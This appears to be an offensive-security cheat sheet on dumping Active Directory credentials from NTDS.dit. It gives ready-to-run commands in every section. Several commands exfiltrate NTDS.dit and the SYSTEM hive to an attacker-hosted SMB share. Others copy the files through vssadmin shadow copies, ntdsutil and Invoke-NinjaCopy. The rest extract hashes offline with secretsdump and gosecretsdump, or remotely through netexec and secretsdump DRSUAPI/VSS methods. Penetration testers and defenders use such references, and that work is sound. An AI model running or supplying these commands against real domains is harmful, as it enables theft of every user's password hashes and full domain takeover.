NTDS

PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Exfiltration - Down DC

OS File System

From the Attacker

smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>

From the Target

net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>

Copy-Item -Force -Path 'C:\Windows\NTDS\NTDS.dit', 'C:\Windows\System32\Config\SYSTEM' -Destination 'X:'

---

Exfiltration - Live DC

VSSAdmin

Creating Shadow Copy of the Volume

vssadmin CREATE SHADOW /For=C:

Extracting NTDS.dit from VSS

cmd.exe /c copy <SHADOW_COPY_NAME>\Windows\NTDS\NTDS.dit <OUTPUT_FILE>
cmd.exe /c copy <SHADOW_COPY_NAME>\Windows\System32\Config\SYSTEM <OUTPUT_FILE>

e.g.

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save

Shadow Copy remove

vssadmin delete shadows /shadow=<SHADOW_COPY_ID>

NTDSUtil

From the Attacker

smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>

From the Target

net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>

ntdsutil "ac i ntds" "ifm" "create full X:\NTDS" quit quit

Invoke-NinjaCopy.ps1

Invoke-NinjaCopy.ps1

Invoke-NinjaCopy.ps1 -Path 'C:\Windows\NTDS\NTDS.dit' -LocalDestination 'C:\Windows\Temp\ntds.dit.save'

---

Secrets Dump - Offline

Once the NTDS.dit and the SYSTEM files are obtained, just proceed as follows to extract the data from them →

Check all related to the SYSTEM Hive Extraction here

Secretsdumpy.py

SecretsDump.py

Offline Dumping

First, both the NTDS.dit and the SYSTEM hive must be extracted from the target

Then, these files are parsed locally as follows →

secretsdump.py -outputfile <FILE> -ntds <NTDS> -system <SYSTEM> local

Gosecretsdump

Gosecretsdump

Faster for larger NTDS.dit files

gosecretsdump -ntds <NTDS> -system <SYSTEM>

---

Secrets Dump - Remote

Netexec

Netexec

DRSUAPI Method

nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --ntds drsuapi

VSS Method

Volume Shadow Copy Service

nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --ntds vss

Secretsdump.py

SecretsDump.py

Regarding Authentication, the different approaches seen here can also be applied when extracting the NTSD.dit

DRSUAPI

Standard Method

• Extract all data from All Users

secretsdump.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'

• Extract data from a given user

secretsdump.py -just-dc-user <USER> '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'

• NTLM Hashes Only

-just-dc-ntlm

secretsdump.py -just-dc-ntlm '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'

• NTLM Hashes and Kerberos EKeys

-just-dc

secretsdump.py -just-dc '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'

NTDSUTIL VSS

secretsdump.py -just-dc-ntlm -use-vss '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'